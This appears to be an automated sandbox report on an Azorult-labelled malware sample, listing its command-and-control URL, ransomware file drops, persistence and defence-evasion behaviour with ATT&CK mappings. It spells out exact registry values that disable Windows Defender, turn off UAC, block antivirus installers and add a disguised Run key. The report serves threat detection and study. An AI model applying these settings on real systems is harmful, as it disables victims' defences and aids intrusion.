azorult | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo/blob/master/README[.]md

Analysis

max time kernel
440s
max time network
485s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-01-2025 03:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/README.md

Score

10^/10

azorult chimera rms defense_evasion discovery evasion execution infostealer lateral_movement motw persistence phishing privilege_escalation ransomware rat spyware stealer trojan upx

Malware Config

Extracted

Family

azorult

http://boglogov.site/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult

Chimera 56 IoCs

Ransomware which infects local and network files, often distributed via Dropbox links.

ransomware chimera

description	flow	ioc	Process
	1032	bot.whatismyipaddress.com	Process not Found
File created		C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Microsoft Office\root\Office16\AugLoop\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_GB\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Crashpad\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\VideoLAN\VLC\lua\http\requests\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\7-Zip\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_CA\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jdk-1.8\jre\lib\ext\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jdk-1.8\lib\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jdk-1.8\jre\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Microsoft Office\root\Office16\Configuration\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jre-1.8\lib\ext\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jdk-1.8\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jdk-1.8\jre\bin\server\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jre-1.8\bin\server\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jre-1.8\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Microsoft Office\root\Office16\MSIPC\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Microsoft Office\root\Office16\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jdk-1.8\jre\lib\security\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\VideoLAN\VLC\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_CA\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jdk-1.8\jre\lib\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\7-Zip\Lang\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
	1031	ip-api.com	Process not Found
File created		C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_US\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Common Files\microsoft shared\ClickToRun\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\dotnet\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Adobe\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_US\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
Key created		\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection	msedge.exe
File created		C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Java\jre-1.8\lib\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created		C:\Program Files\Microsoft Office\root\Office16\1033\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe

Chimera Ransomware Loader DLL 1 IoCs

Drops/unpacks executable file which resembles Chimera's Loader.dll.

ransomware

resource	yara_rule
behavioral1/memory/6612-2729-0x0000000010000000-0x0000000010010000-memory.dmp	chimera_loader_dll

Chimera family
chimera

Modifies Windows Defender Real-time Protection settings 3 TTPs 20 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

UAC bypass 3 TTPs 10 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe

Windows security bypass 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 4 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
10748	net.exe
10196	net1.exe
10228	net.exe
7812	net1.exe

Renames multiple (310) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 2 IoCs

flow	pid	Process
1033	5892	winit.exe
1037	5892	winit.exe

Blocks application from running via registry modification 26 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 45 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
11140	netsh.exe
11240	netsh.exe
8072	netsh.exe
7992	netsh.exe
8492	netsh.exe
5268	netsh.exe
9228	netsh.exe
9964	netsh.exe
7916	netsh.exe
7900	netsh.exe
10764	netsh.exe
9456	netsh.exe
10008	netsh.exe
11108	netsh.exe
6872	netsh.exe
6452	netsh.exe
4276	netsh.exe
9588	netsh.exe
10684	netsh.exe
6136	netsh.exe
7052	netsh.exe
7660	netsh.exe
11192	netsh.exe
11216	netsh.exe
8112	netsh.exe
8648	netsh.exe
8212	netsh.exe
8188	netsh.exe
9848	netsh.exe
9956	netsh.exe
10956	netsh.exe
9464	netsh.exe
8044	netsh.exe
8220	netsh.exe
10168	netsh.exe
10400	netsh.exe
9400	netsh.exe
3596	netsh.exe
8064	netsh.exe
9784	netsh.exe
10772	netsh.exe
10836	netsh.exe
11172	netsh.exe
8020	netsh.exe
10484	netsh.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
6720	attrib.exe
10816	attrib.exe
3080	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
A potential corporate email address has been identified in the URL: 983502BE532960BE0A490D4C@AdobeOrg
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing

Checks computer location settings 2 TTPs 16 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	taskhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	R8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	winlog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	winlogon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	wini.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	taskhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	wini.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	R8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	winlog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	winlogon.exe

Executes dropped EXE 35 IoCs

pid	Process
6236	Azorult.exe
4556	Azorult.exe
6588	wini.exe
6608	wini.exe
5372	Azorult.exe
3688	winit.exe
5892	winit.exe
5384	rutserv.exe
5392	rutserv.exe
2204	rutserv.exe
1052	rutserv.exe
3500	rutserv.exe
6808	rutserv.exe
4008	cheat.exe
6812	cheat.exe
4548	rutserv.exe
1820	rfusclient.exe
2496	rfusclient.exe
6612	HawkEye.exe
6948	ink.exe
6852	ink.exe
6352	taskhost.exe
2080	taskhost.exe
7036	P.exe
1492	P.exe
1788	rfusclient.exe
5012	R8.exe
6636	R8.exe
7416	winlog.exe
7428	winlog.exe
6124	winlogon.exe
8308	winlogon.exe
920	taskhostw.exe
9244	taskhostw.exe
7896	winlogon.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
7224	icacls.exe
10380	icacls.exe
5232	icacls.exe
8808	icacls.exe
10828	icacls.exe
5852	icacls.exe
8160	icacls.exe
9496	icacls.exe
9660	icacls.exe
4552	icacls.exe
3372	icacls.exe
5880	icacls.exe
10352	icacls.exe
6696	icacls.exe
7256	icacls.exe
10016	icacls.exe
10008	icacls.exe
8108	icacls.exe
10308	icacls.exe
8176	icacls.exe
11216	icacls.exe
8092	icacls.exe
7644	icacls.exe
7192	icacls.exe
9284	icacls.exe
9628	icacls.exe
10164	icacls.exe
7752	icacls.exe
8400	icacls.exe
9032	icacls.exe
7988	icacls.exe
7716	icacls.exe
10408	icacls.exe
10620	icacls.exe
8896	icacls.exe
9920	icacls.exe
8140	icacls.exe
5860	icacls.exe
10960	icacls.exe
11100	icacls.exe
10808	icacls.exe
8124	icacls.exe
8720	icacls.exe
7740	icacls.exe
7840	icacls.exe
532	icacls.exe
2452	icacls.exe
8124	icacls.exe
7272	icacls.exe
6912	icacls.exe
9840	icacls.exe
9444	icacls.exe
3436	icacls.exe
7792	icacls.exe
8488	icacls.exe
8040	icacls.exe
6912	icacls.exe
6320	icacls.exe
7984	icacls.exe
8460	icacls.exe
7012	icacls.exe
4796	icacls.exe
428	icacls.exe
7720	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
11112	powershell.exe
3396	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

flow	ioc
1082	iplogger.org
1098	raw.githubusercontent.com
948	raw.githubusercontent.com
1070	raw.githubusercontent.com
1077	iplogger.org
1078	iplogger.org
1097	raw.githubusercontent.com
947	raw.githubusercontent.com
1071	raw.githubusercontent.com
1093	raw.githubusercontent.com
1094	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1032	bot.whatismyipaddress.com
1031	ip-api.com

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc
618	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

Modifies WinLogon 2 TTPs 10 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
